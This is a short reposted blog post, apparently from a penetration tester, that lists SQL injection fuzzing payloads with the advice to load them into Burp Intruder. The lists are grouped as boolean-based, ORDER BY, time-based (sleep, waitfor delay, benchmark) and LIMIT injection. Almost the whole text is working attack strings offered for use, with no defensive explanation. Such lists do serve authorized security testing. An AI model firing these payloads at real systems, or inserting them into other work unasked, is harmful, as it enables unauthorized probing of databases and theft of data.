Sharing some SQL payloads I use in day-to-day testing
Published: 2019-06-22


1: Boolean-based SQL injection

\

'
"
%df'
%df"
and 1=1
and 1=2
' and '1'='1
' and '1'='2
" and "1"="1
" and "1"="2
) and (1=1
) and (1=2
') and ('1'='1
') and ('1'='2
%' and 1=1 and '%'='
%' and 1=2 and '%'='x
%') and 1=1 and ('%'='
%') and 1=2 and ('%'='x
OR 1=1
OR 1=2
' OR 1=1-- -
' OR 1=2-- -
) OR 1=1-- -
) OR 1=2-- -
') OR 1=1-- -
') OR 1=2-- -
" OR "1"="1
" OR "1"="2
' OR '1'='1
' OR '1'='2
) OR (1=1
) OR (1=2
') OR ('1'='1
') OR ('1'='2

2: ORDER BY SQL injection fuzz payloads

(case when(1=1) then 1 else (select 1 union select 2) end)

(case when(1=2) then 1 else (select 1 union select 2) end)
,(1-(case when(1=1) then 1 else (select 1 union select 2) end))
,(1-(case when(1=2) then 1 else (select 1 union select 2) end))
,1=if((1=1),1,(select 1 union select 2))
,1=if((1=2),1,(select 1 union select 2))
,If((1=1),1,(select 1 union select 2))-- -
,If((1=2),1,(select 1 union select 2))-- -
,If((1=1),sleep(4),(select 1 union select 2))-- -
-IF((1=1),1,(SELECT 1 UNION SELECT 2))-- -
-IF((1=2),1,(SELECT 1 UNION SELECT 2))-- -
-(case when(1=1) then 1 else (select 1 union select 2) end)
-(case when(1=2) then 1 else (select 1 union select 2) end)

3: Time-based SQL injection

'%2b(if((1=1 and sleep(4)),1,(select 1 union select 2)))%2b'a

-IF((1=1),sleep(4),(SELECT 1 UNION SELECT 2))-- -
';(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
;SELECT sleep(4)
);SELECT sleep(4)-- -
;SELECT sleep(4)-- -
;(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
' AND SLEEP(4)%23
AND sleep(4)
' AND sleep(4) AND '1'='1
') AND sleep(4) AND ('1'='1
) AND sleep(4) AND (1=1
" AND sleep(4) AND "1"="
') and (select(0)from(select(sleep(4)))x)-- -
and (select(0)from(select(sleep(4)))x)
and (select(0)from(select(sleep(4)))x) and 1=1
' and (select(0)from(select(sleep(4)))x) and '1'='1
" and (select(0)from(select(sleep(4)))x) and "1"="1
) and (select(0)from(select(sleep(4)))x) and (1=1
') and (select(0)from(select(sleep(4)))x) and ('1'='1
rlike (select(0)from(select(sleep(4)))x) and 1=1
' rlike (select(0)from(select(sleep(4)))x) and '1'='1
) rlike (select(0)from(select(sleep(4)))x) and (1=1
') rlike (select(0)from(select(sleep(4)))x) and ('1'='1
;waitfor delay '0:0:4' -- -
';waitfor delay '0:0:4' -- -
);waitfor delay '0:0:4' -- -
');waitfor delay '0:0:4' -- -
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
(SELECT * FROM(SELECT(sleep(4)))lWuP)

4: LIMIT SQL injection

procedure analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)

Usage needs little explanation: just load them into Burp Intruder and fuzz.

Reposted from: https://www.cnblogs.com/depycode/p/5576204.html
